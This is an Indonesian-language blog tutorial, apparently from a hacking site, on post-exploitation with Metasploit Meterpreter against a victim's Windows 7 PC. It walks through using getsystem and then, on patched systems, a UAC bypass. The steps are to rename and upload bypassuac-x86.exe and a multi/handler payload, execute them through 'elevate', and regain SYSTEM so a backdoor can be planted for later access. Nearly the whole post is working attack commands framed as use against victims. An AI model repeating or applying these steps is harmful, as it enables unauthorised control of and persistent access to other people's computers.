Disini saya harap kalian sudah masuk sesi meterpreter
dan apa yang kita lakukan setelah dapat sesi meterpreter
banyak cara yang kita lakukan ketika kita berada pada sesi meterpreter ini
hmmm...yup kita akan mengupload backdoor agar kita bisa masuk ke pc korban lagi tanpa mengexploitnya
tapi kendala masih saja ada yaitu tidak bisa upload backdoor kita
dengan keterangan error access denied atau kita ditolak masuk ke system tersebut
DISINI SAYA HARAP KALIAN SUDAH MENDAPATKAN SESSION METERPRETER 1
ok langsung saja kita mencoba masuk systemnya apabila belum di patch tu windows nya
disini saya harap sudah ada pada meterpreter
lalu ketikkan perintah
getsystem
untuk masuk kesistem
dan coba upload kan lagi backdoor kalian
wow ternyata sukses
lalu kita coba test pada windows 7 yang sudah di patch
DAN JIKA WINDOWS 7 SUDAH DI PATCH alias korban memakai windows 7 sp1
maka ketika kita mau mendapatkan system dengan getsystem maka access denied
dan muncul pesan error pada windows korban
hmmm ternyata bener bener sudah di patch
disini kita harus sudah masuk meterpreter dulu sebelum membypass nya
dan cara untuk mengakalinya dengan menggunakan tehnik bypass.exe yang ada pada folder /opt/metasploit/msf3/data/post
buka lagi msfconsole
lalu buat exploit multi handler
use exploit/multi/handler
exploit
lalu bikin payload multi handler dan simpan dengan nama 4444.exe pada desktop
buka terminal baru masukkan perintah
cd /opt/metasploit/msf3/data/post
disana kita kana melihat bypass nya disini korban menggunakan system 32 bit jadinya saya memilih x86
dan sekarang copy bypass nya pada desktop dan rename nya disini korban menggunakan 32bit dan saya rename bypassnya disini saya rename jadi trokanzboy.exe
cp bypassuac-x86.exe /root/Desktop/www.cybersquads.com.exe
nah hasilnya kita punya 2 file di desktop
1. Payload multi handler yang kita buat tadi
2. bypass yang barusan kita copy
dengan perintah pwd
ternyata exploit kita yang dieksekusi sebelumnya ada di D:
sekarang mulailah kita upload bypass.exe yang telah kita rename tadi di desktop
upload /root/Desktop/www.cybersquads.com.exe D:\
lalu upload juga payload yang telah kita buat sebelumnya
upload /root/Desktop/4444.exe D:\
sekarang kita masuk cmd korban untuk mengesekusinya menggunkan perintah
shell
lalu eksekusi payload dibawah bypass dengan perintah
www.cybersquads.com.exe elevate /c D:\4444.exe
dan beralihlah pada console kedua (msfconsole yang baru dibuat tadi) dan coba untuk dapatkan systemnya dengan perintah
getsystem
woowwww work
:>
Post a Comment